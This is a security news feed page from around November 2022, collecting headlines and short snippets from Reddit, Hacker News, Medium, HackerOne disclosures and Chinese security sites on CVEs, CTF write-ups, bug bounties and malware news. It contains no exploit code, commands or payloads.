    从一道题入门 UEFI PWN
    作者:Rivaille@知道创宇404实验室 日期:2022年11月10日 周末的时候打了n1ctf,遇到一道uefi相关的题目,我比较感兴趣,之前就想学习一下安全启动相关的东西,这次正好趁着这个机会入门一下。 周天做的时候,一直卡在一个点上,没有多去找找资料属实败笔。 题目分析 先解包OVMF.fd文件,用uefi-firmware-parse这个工具: uefi-firmware-par...
  • Open

    从一道题入门 UEFI PWN
    作者:Rivaille@知道创宇404实验室 日期:2022年11月10日 周末的时候打了n1ctf,遇到一道uefi相关的题目,我比较感兴趣,之前就想学习一下安全启动相关的东西,这次正好趁着这个机会入门一下。 周天做的时候,一直卡在一个点上,没有多去找找资料属实败笔。 题目分析 先解包OVMF.fd文件,用uefi-firmware-parse这个工具: uefi-firmware-par...

  • Open

    CVE-2021-24031, CVE-2021-24032: Zstandard could be made to expose sensitive info
    Article URL: https://ubuntu.com/security/notices/USN-5720-1 Comments URL: https://news.ycombinator.com/item?id=33539866 Points: 3 # Comments: 0
  • Open

    Write up for the API secure programming challenge that was inspired by the major security incident happened to second largest telco in Australia
    submitted by /u/pi3ch [link] [comments]
    Checkmk: Remote Code Execution by Chaining Multiple Bugs (2/3)
    submitted by /u/monoimpact [link] [comments]
    Exploring ZIP Mark-of-the-Web Bypass Vulnerability (CVE-2022-41049)
    submitted by /u/CyberMasterV [link] [comments]
    Compromising Plesk via its REST API
    submitted by /u/adrian_rt [link] [comments]
  • Open

    What credentials should I require for a third party netsec company?
    My small software company got a recommendation for a firm that does cybersecurity audits. We've engaged them for a scope of work that includes Soc2/Type2, pen testing, some code review. We're a med device company, so we're very used to asking for the credentials of auditors and FDA type agents. But what should I ask for (and expect to see) from a cybersecurity company? submitted by /u/jeremynd01 [link] [comments]
    Planning to start studying for CISSP, hesitating between paper books and eReader version
    Hi everyone, essentially, everything is in the title. I am hesitating between physical books and digital version of CISSP study materials. The book I'm planning to acquire is " CISSP All-in-one Exam Guide 9th edition" by Fernando Maymi. Why should I take one version versus the other? I understand that I could take notes on the fly with a kindle, Kobo and other eReader, but I never owned one so my experience is limited. Thank you. submitted by /u/hey_its_meeee [link] [comments]
    How can I test my WAF
    I have recently added a bunch of managed rules on my WAF for bot mitigation. I am keen to test these out to see how effective these rules are against common botnet attacks. Any ideas how I can go about this? submitted by /u/goldenarms_22 [link] [comments]
    Do enterprises implement IP based controls on VPN services?
    I want understand if it is fairly common practice in enterprise security where they implement IP based controls on VPN solutions to prevent incidents. Targeting and exploiting VPN products is a theme within among adversaries, not just limited to vulnerability but also abuse of credentials. So I just wondering if IP based controls can help? or practicle at all without impacting user access. Logically I sense whitelisting would be the way to go or do they use blocklisting IP address? In either case, since setup is for remote user and he can be anywhere, how do they go about implementing it? Do they use some advance engine that takes into account behavioural aspect, traffic patterns or IP reputation rather than simple listing out blocked/allowed IP address as in good old ACLs. submitted by /u/bawlachora [link] [comments]
    Can I get hacked by clicking on a YouTube video?
    Not from any links, just straight through a youtube video on the site. I clicked on some YouTube video for a song I liked which was leaked from an artist I listen to. It turned out to be a fake channel with his name and profile picture. I'm kinda worried now. I get overly paranoid about this kinda stuff. There were about 15k other people who watched this video. submitted by /u/Foreign-Magician-767 [link] [comments]
  • Open

    Fuzzing — An Overview For Beginners
    Fuzzing is a really common technique utilized by security researchers when looking for vulnerabilities in software. Lets get an overview. Continue reading on Medium »
  • Open

    Fuzzing — An Overview For Beginners
    Fuzzing is a really common technique utilized by security researchers when looking for vulnerabilities in software. Lets get an overview. Continue reading on Medium »
  • Open

    Ask HN: How to respond to compensation request to reveal security vulnerability
    You're a small startup and someone claiming to be a bug bounty hunter cold reaches out to you to say they've discovered a critical security vulnerability on your website. They want to know if you have a bug bounty program and what type of reward they'll receive if they disclose it to you. Being a small startup, you don't have any formal program and cash is tight, but you want to take the report seriously if there is some critical vulnerability in your application. What's the right way to respond to this type of reach out? Comments URL: https://news.ycombinator.com/item?id=33537375 Points: 3 # Comments: 3
    Patch released for the critical OpenSSL vulnerability
    Article URL: https://beaglesecurity.com/blog/vulnerability/openssl-critical-vulnerability-patch.html Comments URL: https://news.ycombinator.com/item?id=33527634 Points: 4 # Comments: 2
  • Open

    How to hack any social media account?
    Everyone knows that this is one of the most asked questions on the internet. So, let’s answer. But first, let me break the question into… Continue reading on System Weakness »
    How to hack any social media account?
    Everyone knows that this is one of the most asked questions on the internet. So, let’s answer. But first, let me break the question into… Continue reading on Medium »
    Invinsense OXDR and Invinsense OMDR:
    Till the time adversaries exploit vulnerabilities in people, processes or technology, organizations have no idea of those vulnerabilities. Continue reading on Medium »
  • Open

    OSINT of Shamsi Airbase and USAF on it.
    You might think that like other blogs and reports on Shamsi Airbase, this will be same. But no, We may have something more interesting. We… Continue reading on Medium »
  • Open

    Interesting Account Takeover Bugs
    No content preview
    Cool Recon techniques every hacker misses! Episode 3
    No content preview
  • Open

    Interesting Account Takeover Bugs
    No content preview
    Cool Recon techniques every hacker misses! Episode 3
    No content preview
  • Open

    Interesting Account Takeover Bugs
    No content preview
    Cool Recon techniques every hacker misses! Episode 3
    No content preview
  • Open

    What is PKI, and why is it being used?
    Ever thought about how you can validate the authenticity of a website and the data we are sending to it is really safe? Continue reading on CodeX »
    Searching for Subdomain Vulnerabilities using Censys
    TL;DR- A ‘how-to’ on utilizing a great tool that takes the concept of ‘Google dorking’ to a whole new level. This article is highly… Continue reading on The Gray Area »
    SynFutures Launches V2 Mainnet Bug Bounty
    With SynFutures V2 Closed Alpha in progress for the last several weeks, we’re excited to launch a new bug bounty program to get our… Continue reading on SynFutures »
    Fuzzing Web Applications using FFuf
    FFuf is a fast web fuzzer written in Go. In, this article we will learn how to use FFuf to enumerate directories and break authentication… Continue reading on Towards Data Science »
    MY FIRST ACCOUNT TAKEOVER
    Heyyyy buddies, Continue reading on Medium »
  • Open

    SecWiki News 2022-11-09 Review
    机器学习为何难以应用于真实的网络入侵检测系统?(上) by ourren Electron攻击面分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-09 Review
    机器学习为何难以应用于真实的网络入侵检测系统?(上) by ourren Electron攻击面分析 by ourren 更多最新文章,请访问SecWiki
  • Open

    Hunting for Canary Tokens in various formats 😈
    https://github.com/C0axx/CanaryHunter submitted by /u/_C0axx [link] [comments]
    They See Me Roaming: Following APT29 by Taking a Deeper Look at Windows Credential Roaming | Mandiant
    submitted by /u/dmchell [link] [comments]
  • Open

    VMware 修复了三个身份认证绕过漏洞
    这些漏洞使远程攻击者能够绕过身份验证并提升管理员权限。
    FreeBuf早报 | 欧盟政府被指控使用间谍软件掩盖腐败和犯罪;因更新缺陷特斯拉召回4万辆汽车
    由于固件更新导致汽车电动助力转向系统缺陷,特斯拉已经启动了超过 40000 辆 Model S 和 Model X 车辆的自愿召回。
    反调试,看这一篇就够了
    反调试手册
    《2022 企业数据安全能力建设现状研究报告》调研启动
    FreeBuf 咨询将正式启动《2022 企业数据安全能力建设现状》的研究,并开展相关行业调研工作。
    注意!一个新的恶意扩展可以远程控制你的谷歌浏览器
    一个新的 Chrome 僵尸网络,它使用恶意扩展来窃取帐户、记录击键、注入广告和恶意 JS 代码,并让受害者的浏览器参与 DDoS 攻击。
  • Open

    CVE-2021-44707 Adobe Reader 越界写漏洞分析与利用
    作者:Joey@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/elLI4YvJ0u9yYoyQpsv1og 漏洞概述 该漏洞为2021年天府杯中使用的Adobe Reader越界写漏洞,漏洞位于字体解析模块:CoolType.dll中,对应的Adobe Reader版本为:21.007.20099。 原理分析 开启page heap后打开POC,Adobe崩...
    Chrome V8 引擎类型混淆漏洞分析 (CVE-2021-38001)
    作者:Carl Yu@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/PY_QiNgEk9F3nSSgxECfTg 10月28日,谷歌Chrome在发布95.0.4638.69版本时修复了天府杯上昆仑实验室提交的漏洞CVE-2021-38001。由于此漏洞的PoC非常简洁使得作者对V8引擎产生了强烈的兴趣,分析此漏洞也是作者对V8的一次学习。V8是...
  • Open

    CVE-2021-44707 Adobe Reader 越界写漏洞分析与利用
    作者:Joey@天玄安全实验室 原文链接:https://mp.weixin.qq.com/s/elLI4YvJ0u9yYoyQpsv1og 漏洞概述 该漏洞为2021年天府杯中使用的Adobe Reader越界写漏洞,漏洞位于字体解析模块:CoolType.dll中,对应的Adobe Reader版本为:21.007.20099。 原理分析 开启page heap后打开POC,Adobe崩...
    Chrome V8 引擎类型混淆漏洞分析 (CVE-2021-38001)
    作者:Carl Yu@墨云科技VLab Team 原文链接:https://mp.weixin.qq.com/s/PY_QiNgEk9F3nSSgxECfTg 10月28日,谷歌Chrome在发布95.0.4638.69版本时修复了天府杯上昆仑实验室提交的漏洞CVE-2021-38001。由于此漏洞的PoC非常简洁使得作者对V8引擎产生了强烈的兴趣,分析此漏洞也是作者对V8的一次学习。V8是...
  • Open

    Movies, TV Shows and More
    https://dl2.tarahipro.ir/ submitted by /u/Thea1pha [link] [comments]
  • Open

    CyberDucky, hacking made fun!
    Hi everyone ! I am starting a new series to make hacking fun for everyone! Please , I'd love any feedback! I'm here for you! https://youtube.com/playlist?list=PLphiijzMibrnNkK7EFdHmEJMHoZiFD_6k submitted by /u/cyberducky0_0 [link] [comments]

  • Open

    What types of technical writing documents do we as examiners complete?
    I need to make a list of the types of documents that we as examiners complete (i.e. police reports, evidence logging, and such) submitted by /u/swatteam23 [link] [comments]
    Need help with creating a forensic training program
    Hello forensic community! I am in need of resources to create a forensic training/mentoring curriculum/program. Backstory, the corp that I work for has tasked me to stand-up this program. We mainly deal with corp forensics, but I also have a background in LE forensics. The program is to train new accessions on the labs policies and procedures, plus create a full mentor program that includes acquisition, examination, and documentation/reporting. There is no real timeline but six months seems doable. My knowledge on forensic subjects is good, but I have never created a robust training program like this. Any knowledge, resources, or tips would be greatly appreciated! submitted by /u/tummy_tickler2077 [link] [comments]
    GCFA ressources and material
    Hello, I am looking for free ressources and material (courses, annals…) to train before to go to FOR508 SANS class. I already looked Into that subreddit I only find indexes of books. Do you have some links ressources or pdf to share ? Does people who already did FOR508 still have pdf ? Thank you very much for you help. submitted by /u/Wild_Hamster9181 [link] [comments]
  • Open

    Host Header Injection Attack - www.xnxx.com
    XVIDEOS disclosed a bug submitted by cyber_anon: https://hackerone.com/reports/1630073
    Self-XSS on Suggest Tag dialog box
    XVIDEOS disclosed a bug submitted by j3rry4unt: https://hackerone.com/reports/1761505 - Bounty: $50
    Apache Flink RCE via GET jar/plan API Endpoint
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1418891 - Bounty: $6000
    Kafka Connect RCE via connector SASL JAAS JndiLoginModule configuration
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1529790 - Bounty: $5000
    Grafana RCE via SMTP server parameter injection
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1200647 - Bounty: $5000
    [Kafka Connect] [JdbcSinkConnector][HttpSinkConnector] RCE by leveraging file upload via SQLite JDBC driver and SSRF to internal Jolokia
    Aiven Ltd disclosed a bug submitted by jarij: https://hackerone.com/reports/1547877 - Bounty: $5000
  • Open

    CRTP EXAM REVIEW
    Actually, a few months ago i can pass my CRTP (Certified Red Team Professional) exam. Continue reading on Medium »
    Azure Exploitation Toolkit
    Azure Exploitation Toolkit for Red Team & Pentesters Continue reading on Medium »
  • Open

    Comodo: From .Git to Takeover
    First let’s start with what is Comodo? Continue reading on Medium »
    Cool Recon techniques every hacker misses! Episode 3
    Welcome to the 3rd Episode of Cool Recon Techniques. We are back with some more cool recon techniques which we think hackers out there… Continue reading on InfoSec Write-ups »
    How I Created My Own Custom Script Automation Tool For Web Application Hacking
    I created automation recon script tool for my web application hacking & reconnaissance tasks which I am going to share. Continue reading on Medium »
    Behind-the-Scenes of Infosec Writeups
    How the publication grew since 2017, one message at a time. Continue reading on InfoSec Write-ups »
    Automate and finds the IP address of a website behind Cloudflare
    Hello Fellow Hackers, today i want show you how to automate the discovering of origin IP of those sites behind CloudFlare, using Censys… Continue reading on Medium »
    Some Tips to Finding IDORs more easily and Fixing them
    This time I want to tell about IDOR blinkers which are the keys for finding IDORs faster and some tips for programmers which want to have… Continue reading on Medium »
    Welcome to the MVC Incentivized Testnet
    MVC is a revolutionary public blockchain integrated with multiple innovations. Continue reading on Medium »
    SMTP Misconfiguration
    SMTP is a potential protocol to exploit in bug bounty and penetration testing. Continue reading on Medium »
  • Open

    SimpleX Chat: security assessment by Trail of Bits and v4.2 released
    submitted by /u/epoberezkin [link] [comments]
    How to deal with ransomware on Azure
    submitted by /u/MiguelHzBz [link] [comments]
    Vulnerabilities in Tenda's W15Ev2 AC1200 Router
    submitted by /u/WiseTuna [link] [comments]
    SpyGuard:: a forked and enhanced version of TinyCheck. The main objective is to detect signs of compromise by monitoring network flows transmitted by a device.
    submitted by /u/lugh [link] [comments]
    Research on Flow Computers Used in Oil and Gas
    submitted by /u/derp6996 [link] [comments]
    Jit-Picking: Differential Fuzzing of JavaScript Engines [PDF]
    submitted by /u/Gallus [link] [comments]
    New updated IceXLoader claims thousands of victims around the world
    submitted by /u/woja111 [link] [comments]
    #ShortAndMalicious: StrelaStealer aims for mail credentials
    submitted by /u/OwnPreparation3424 [link] [comments]
    We sign code now | Trail of Bits Blog
    submitted by /u/D4r1 [link] [comments]
    Shennina Framework - Automating Host Exploitation with AI
    submitted by /u/mazen160 [link] [comments]
    DefCon 30: Exploitation in the era of formal verification [video]
    submitted by /u/Adam_pi3 [link] [comments]
    We’re Christian Mouchet, Jean-Philippe Bossuat, Kurt Rohloff, Nigel Smart, Pascal Paillier, Rand Hindi, Wonkyung Jung, various researchers and library developers of homomorphic encryption to answer questions about homomorphic encryption and why it’s important for the future of data privacy! AMA
    submitted by /u/carrotcypher [link] [comments]
  • Open

    Intro to & troubleshooting SIEM Collector Issues
    Blue Team in SOC Continue reading on InfoSec Write-ups »
    Auditing the Network Devices using Nipper
    SecTools Continue reading on InfoSec Write-ups »
    Behind-the-Scenes of Infosec Writeups
    No content preview
  • Open

    Intro to & troubleshooting SIEM Collector Issues
    Blue Team in SOC Continue reading on InfoSec Write-ups »
    Auditing the Network Devices using Nipper
    SecTools Continue reading on InfoSec Write-ups »
    Behind-the-Scenes of Infosec Writeups
    No content preview
  • Open

    Intro to & troubleshooting SIEM Collector Issues
    Blue Team in SOC Continue reading on InfoSec Write-ups »
    Auditing the Network Devices using Nipper
    SecTools Continue reading on InfoSec Write-ups »
    Behind-the-Scenes of Infosec Writeups
    No content preview
  • Open

    How I detected my own data leakage of email, ph no , and other pII data over Internet
    Found Leakage of my own private data (No , email , and my pII data) over internet (HUMINT) Continue reading on Medium »
    20 regular expressions examples to search for data related to cryptocurrencies
    In what cases you may find this article useful Continue reading on Medium »
  • Open

    Free online conference about fuzzing automotive software
    Article URL: https://www.fuzzcon.eu/automotive-edition Comments URL: https://news.ycombinator.com/item?id=33520412 Points: 1 # Comments: 0
  • Open

    SecWiki News 2022-11-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-08 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Spotify’s Vulnerability Management Platform
    Article URL: https://engineering.atspotify.com/2022/11/spotifys-vulnerability-management-platform/ Comments URL: https://news.ycombinator.com/item?id=33520105 Points: 2 # Comments: 0
  • Open

    Auditing Exchange Online From an Incident Responder’s View
    Business Email Compromise (BEC) within the Microsoft 365 environment is becoming a more common attack vector. In case you’re unfamiliar with what exactly BEC entails, it’s when an attacker or unauthorized user gains access to a business email account via social engineering. Most commonly, an attacker compromises an account, intercepts email conversation(s), and uses this... The post Auditing Exchange Online From an Incident Responder’s View appeared first on TrustedSec.
  • Open

    Static Code Analyzer for JAVA development: any recommendations ??
    Seeing the new Secure Software Development Framework, NIST SP-800-218, I see that static code analysis is now mandatory. Any recommendations out there ? Checkmarx and Synk keep popping up in searches, but would like t hear from people who have implemented and/or used Static Code Analysis, and specifically for JAVA Development environments. . . . submitted by /u/salgak [link] [comments]
    Getting a job in cybersecurity with misdemeanors?
    hey all, I have my associates in CIS and was about to do my bachelors in Cybersecurity in the upcoming winter semester; specifically digital forensics but am open to other options. However, I have a couple misdemeanors on my record now; Retail Fraud 3rd degree (shoplifting), DUI, and Leaving the scene of a PI Accident (Hit & Run). How realistic is it for me to successfully enter the field after graduation, if I choose to continue with this program; or should I consider another field of study. thanks in advance for the honest advice. ​ TLDR: Can I enter cybersecurity field with Shoplifting, DUI, and Hit and run on my criminal record?? submitted by /u/Ornery_Item_520 [link] [comments]
  • Open

    Redis数据结构(二)-List、Hash、Set及Sorted Set的结构实现
    之前介绍了Redis的数据存储及String类型的实现,接下来再来看下List、Hash、Set及Sorted Set的数据结构的实现。
    京东云RDS数据迁移常见场景攻略
    云时代已经来临,云上很多场景下都需要数据的迁移、备份和流转,各大云厂商也大都提供了自己的迁移工具。本文主要介绍京东云数据库为解决用户数据迁移的常见场景所提供的解决方案。
    CVE-2022-3602 OpenSSL缓冲区溢出漏洞分析
    OpenSSL官方在2022年11月1号发布了漏洞编号为CVE-2022-3602的缓冲区溢出漏洞。
    FreeBuf早报 | 英国雇用印度黑客进行非法“调查”;新的钓鱼软件专门针对开发人员
    英国《星期日泰晤士报》6日披露了英国情报公司是如何雇用印度黑客对企业、记者和政治人物进行非法“调查”的。
    卧底揭秘:印度雇佣黑客行业背后的英国大雇主
    对印度“雇佣黑客”来说,英国是一个富矿。
    初涉内网,提权那些事
    前段时间打了两个靶场 由于内网接触的不多 这里在结束之后 做了一下相关方面的知识整理,对于初涉内网的小白来说,可以作为一个较好的参考。
    自称“正义之刃”的黑客组织瞄准沙特阿拉伯,可能与伊朗有关
    自称“正义之刃”的攻击组织发布了 Smart Link BPO Solutions 泄露的数据。
    倒计时 8 天!第 8 届 CIS 网络安全创新大会即将起航
    2022年,CIS网络安全创新大会走到了第八届 ,11 月 8 日,距离大会正式召开仅剩 8 天!
    头铁!医疗保险巨头拒绝向黑客支付赎金
    澳大利亚最大的医疗保险公司Medibank拒绝向发动网络攻击并窃取其内部数据的网络犯罪分子支付赎金。
    全国首个!《信息安全技术 关键信息基础设施安全保护要求》发布
    《信息安全技术 关键信息基础设施安全保护要求》是关键信息基础设施安全保护标准体系的构建基础,将于2023年5月1日正式实施。
  • Open

    Introduction to Wireless Networking
    submitted by /u/tbhaxor [link] [comments]
  • Open

    进宫 SAML 2.0 安全
    作者:Longofo@知道创宇404实验室 日期:2022年11月8日 SAML始于2001年,最终的SAML 2.0版本发布于2005年,此后也没有发布大版本,SAML 2.0一直延续到了现在。SAML已经是老古董了,现在SSO里面使用更多的是OAuth。在某些漏洞平台看到过一些SAML漏洞报告,一些大型应用依然出现过它的身影,最近看到的一个议题《Hacking the Cloud Wit...
  • Open

    进宫 SAML 2.0 安全
    作者:Longofo@知道创宇404实验室 日期:2022年11月8日 SAML始于2001年,最终的SAML 2.0版本发布于2005年,此后也没有发布大版本,SAML 2.0一直延续到了现在。SAML已经是老古董了,现在SSO里面使用更多的是OAuth。在某些漏洞平台看到过一些SAML漏洞报告,一些大型应用依然出现过它的身影,最近看到的一个议题《Hacking the Cloud Wit...

  • Open

    Public Github Repo Leaking Internal Credentials
    Yelp disclosed a bug submitted by xinfohuggerx: https://hackerone.com/reports/1763266
    Subdomain Takeover via Unclaimed Amazon S3 Bucket (Musical.ly)
    TikTok disclosed a bug submitted by daik0n: https://hackerone.com/reports/1102537 - Bounty: $200
    Exceed photo dimensions, Flickr.com
    Flickr disclosed a bug submitted by 0xcyborg: https://hackerone.com/reports/1755552 - Bounty: $50
    I found another way to bypass Cloudflare Warp lock!
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1605847 - Bounty: $1000
    Bypass Cloudflare WARP lock on iOS.
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1542450 - Bounty: $500
    Completely remove VPN profile from locked WARP iOS cient.
    Cloudflare Public Bug Bounty disclosed a bug submitted by joshatmotion: https://hackerone.com/reports/1633231 - Bounty: $1000
  • Open

    Lost at Sea Writeup
    Instructions: Crack the password to open the ship logbook file Continue reading on The Sleuth Sheet »
    The Last Hunter Standing: A Historic OSINT CTF — Writeup
    Mission Briefing Continue reading on The Sleuth Sheet »
    Loose Threads
    By Omega Point & The Hermetic Penetrator Continue reading on Medium »
  • Open

    HuskyHacks: Interview
    Red Teamer, Ethical Hacker, Researcher Continue reading on Medium »
    Malware Development pt. 2 — Understanding Different PE Sections
    As a continuation to my study, this note goes a little bit deeper into the different portion of “Sections” of a Portable Executable (PE)… Continue reading on Medium »
    Invinsense OXDR and Invinsense OMDR:
    Red Teaming Solutions and Services that Help You Witness Attackers Without Actual Attacks Continue reading on Medium »
    Hacking Tools & Resources for Bug Bounties, Red Teaming, And More!
    A curated list of the top hacking tools I’ve found work for bug hunting and pen-testing better than the rest. Continue reading on The Gray Area »
  • Open

    Can anyone help with setting up a cyber security discord, and review how it looks so far. Any feedback is greatly appreciated!! Thanks
    https://discord.gg/92F9h788JG submitted by /u/Jazzlike_Heart_7184 [link] [comments]
    Devs who had their work penetration-tested: what was the most surprising result or fact you heard/learned?
    I was just curious about what your oddest or funniest or worst experiences were, what you learned or what surprised you the most. Thats all folks :) submitted by /u/Notalabel_4566 [link] [comments]
    Question about DatAshur SD
    Quoting from their website: datAshur SD is a PIN authenticated, hardware encrypted, USB Type-C flash drive designed to incorporate removable iStorage microSD Cards. It is FIPS 140-3 Level 3 certified which means it is tamper-proof. So my view is: tamper proof is only USB stick aka SD card reader, not SD card itself. Why would I hack into HW (USB stick) when all valuable data is stored on SD card? I can take SD card from that FIPS 140-3 Level 3 reader, insert it into a $10 SD reader and start brute forcing. Whole other level are regular USB sticks with fixed memory chip. If they are FIPS 140-3 Level 3 certified that means you cannot remove the memory chip (which stores your data in encrypted form) without destroying the chip itself. ​ The problem of losing SD card and its consequences are not explained at all. There's one comment on Youtube saying "SD card should not be readable in other device". How did they achieve it? submitted by /u/mrmh1 [link] [comments]
    Teach me something about telephony security!
    Over the past year, I have been working on a concept for an ECC(Emergency Communications Center aka a 911 Dispatch Center) focused security platform offering. I have been finding via outreach and research that cyber-attacks both on computer networks and CAD(Computer Aided Dispatch) telephony systems are becoming more and more prevalent. It almost feels like every time I talk to an ECC director I hear a new story about some ransomware attack that brought the ECC back to operating on pen and paper or an ECC that experienced a telephony denial of service attack that caused all of their 911 trunks to ring at capacity(Effectivly knocking an entire 911 center out of action). One of the things I love about my job is that solving these problems helps first responders save lives! So, help me help all of our first responders and public safety workers out there! Tell me about what you guys know specifically about telephony based cyber-attacks. Things like telephony denial of service, spoofing and common ways to protect against those types of attacks. Tell me about your experiences with Telephony security in general! If you work in Public Safety IT/Security; tell me about your experience with ANI/ALI and CAD security! submitted by /u/DeMiNe00 [link] [comments]
    What are your thoughts on automated pentest tools?
    Our team is thinking of getting cloud best pentest tools. Such as Fortipentest? Do you think this can replace manual pentest? Just wanted to get some advice before we invest into this. Or just keep up with the traditional pentest? Thanks. submitted by /u/Hinata778 [link] [comments]
    How to mitigate SSRF in PDF converter via an OLE Object?
    I have an application that is converting files to PDF via LibreOffice. I've managed to stop SSRF via HTML, by inspecting files and ensuring they are ODT/DOC/DOCX. But now, I've had a pentest and they've identified that they can add an OLE object, and that will do SSRF. (Like this: https://r4id3n.medium.com/ssrf-exploitation-in-spreedsheet-to-pdf-converter-2c7eacdac781 ) How can I stop SSRF in this case? submitted by /u/Soggy_Bag_8745 [link] [comments]
    Knowledge management systems for small teams
    I have a small pentesting team (<10 people), which works great on a technical level, but we realized systematically storing knowledge and making it accessible for everyone is annoyingly hard. I'd love to keep it as simple as possible. I'm now trying out various tools. I've only heard good things of obsidian, notion and joplin. What tools do you recommend to structure, store and share knowledge? submitted by /u/fishy-colinmclean [link] [comments]
  • Open

    is there a better way to view/explore the directories?
    I can see the filenames, size etc in folders but it would be cool to be able to see the images and video thumbnails etc without actually clicking the links. Give it file explorer kind of look in the browser. It would make it easy to take a quick look on the contents of directory. Has it already been done? Can somebody provide JavaScript code for this? I can/may code a solution for it if I don't find a decent solution here. ​ Suggest more edits to make this more reachable/understandable because I couldn't find a decent solution on internet. submitted by /u/uzair7866 [link] [comments]
    Massive NSFW image gallery and Films
    I stumbled into this at first - NSFW Then, of course, I am at a complete loss when I followed up the chain- Frankly, I have no idea what to do with it. This is just a MASSIVE NSFW picture gallery that has nothing to do with the above two submitted by /u/Nathen_black [link] [comments]
    A good set of TV series and Movies with Smaller Sizes
    I don't know if this was posted here before, but I randomly found this while searching for Black Adder. Smaller sizes are great for downloading with limited internet connections. Here. submitted by /u/Nathen_black [link] [comments]
    Images
    So you want an Image... Link... Stay out of depressive_etc/ sick shit... Yep ripped & torrenting why not... submitted by /u/xanderTgreat [link] [comments]
  • Open

    How we ‘hacked’ Telenet’s cybersecurity quiz
    Not so long ago, Telenet Business ran a quiz to find the smartest cyber specialist. The quiz consisted out of 20 questions and your score… Continue reading on Medium »
    Let’s Cheat by changing FALSE to TRUE!
    Hello H4ck3rs, c0ff33b34n here with a new write-up. In last write-up we have seen a simple DOM based XSS Trick. Today we are going to… Continue reading on Medium »
    Stormshield SNS cleartext password leak
    Foreword : the issue was privately disclosed to Stormshield. In is in their eyes a minor inconvenience but are not willing to address this… Continue reading on Medium »
    Hacking Tools & Resources for Bug Bounties, Red Teaming, And More!
    A curated list of the top hacking tools I’ve found work for bug hunting and pen-testing better than the rest. Continue reading on The Gray Area »
    Gift Card Hacking
    During the past few years, I’ve read many articles about how hackers steal your gift card balance before you use it. I read what they were… Continue reading on Medium »
  • Open

    Awesome CISO Maturity Models
    submitted by /u/hipver [link] [comments]
    Substation: data pipeline and transformation toolkit for security teams
    submitted by /u/jshlbrd-brex [link] [comments]
    Client-side path traversal attacks
    submitted by /u/albinowax [link] [comments]
    Malicious Python Packages Replace Crypto Addresses in Developer Clipboards
    submitted by /u/louis11 [link] [comments]
    drgn - a debugger with an emphasis on programmability
    submitted by /u/Gallus [link] [comments]
  • Open

    SecWiki News 2022-11-07 Review
    SecWiki周刊(第453期) by ourren 关键信息基础设施安全保护标准体系解析 by ourren 如何跨平台追踪社交媒体用户 by ourren 浅谈终端安全与DLP治理 by ourren 现代化安全产品 by ourren 如何测试设置(Setting)功能 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    SecWiki News 2022-11-07 Review
    SecWiki周刊(第453期) by ourren 关键信息基础设施安全保护标准体系解析 by ourren 如何跨平台追踪社交媒体用户 by ourren 浅谈终端安全与DLP治理 by ourren 现代化安全产品 by ourren 如何测试设置(Setting)功能 by 蓝色淡风 更多最新文章,请访问SecWiki
  • Open

    P4 CTF: Apfel Seite
    No content preview
    ‍IW Weekly #32: 2FA Bypass, OpenSSL Vulnerabilities, Automated Recon Script, Subdomain…
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    HTB ‘Blackfield’ [Writeup]
    ASREPRoast | Dictionary attack | Continue reading on InfoSec Write-ups »
    Enterprise — Tryhackme Writeup
    No content preview
    Story of a $1k bounty — SSRF to leaking access token and other sensitive information
    No content preview
  • Open

    P4 CTF: Apfel Seite
    No content preview
    ‍IW Weekly #32: 2FA Bypass, OpenSSL Vulnerabilities, Automated Recon Script, Subdomain…
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    HTB ‘Blackfield’ [Writeup]
    ASREPRoast | Dictionary attack | Continue reading on InfoSec Write-ups »
    Enterprise — Tryhackme Writeup
    No content preview
    Story of a $1k bounty — SSRF to leaking access token and other sensitive information
    No content preview
  • Open

    P4 CTF: Apfel Seite
    No content preview
    ‍IW Weekly #32: 2FA Bypass, OpenSSL Vulnerabilities, Automated Recon Script, Subdomain…
    No content preview
    Write-up: Unprotected admin functionality @ PortSwigger Academy
    No content preview
    HTB ‘Blackfield’ [Writeup]
    ASREPRoast | Dictionary attack | Continue reading on InfoSec Write-ups »
    Enterprise — Tryhackme Writeup
    No content preview
    Story of a $1k bounty — SSRF to leaking access token and other sensitive information
    No content preview
  • Open

    FreeBuf早报 | 英国NCSC扫描所有互联网设备;网络攻击使丹麦DSB旗下火车停运
    英国国家网络安全中心 (NCSC) 宣布,正在扫描所有在英国托管的互联网暴露设备,以查找漏洞。
    警惕!新形式的钓鱼软件专门针对 Python 开发人员
    最近,一种新形式的钓鱼软件专门攻击 Python 开发人员。目前,这些软件包的下载量已高达 5,700 次。
    系统内核到底层芯片,你关注的移动安全问题这届 MOSEC 上都有
    11月4日,由奇安盘古(盘古实验室)和韩国POC主办的2022 MOSEC移动安全技术峰会在上海隆重举行。
    网络安全保险再迎利好,《关于促进网络安全保险规范健康发展的意见(征求意见稿)》
    网络安全保险是为网络安全风险提供保险保障的新兴险种,已成为转移、防范网络安全风险的重要工具,在推进网络安全社会化服务体系建设发挥重要作用。
    「WitAwards中国网安行业2022年度评选」评委名单正式揭晓
    WitAwards 2022线下颁奖盛典将于11月16日在「CIS2022网络安全创新大会」上海主会场隆重举行。
    国务院新闻办发布《携手构建网络空间命运共同体》白皮书
    北京11月7日电 国务院新闻办公室7日发布《携手构建网络空间命运共同体》白皮书
    知名会计事务所被拿下,近期LockBit勒索软件动作频频
    勒索软件组织 LockBit从知名会计事务所Kearney Company 窃取了数据并索要200万美元赎金。
  • Open

    黑客使用恶意版本的 KeePass 和 SolarWinds 软件分发 RomCom RAT
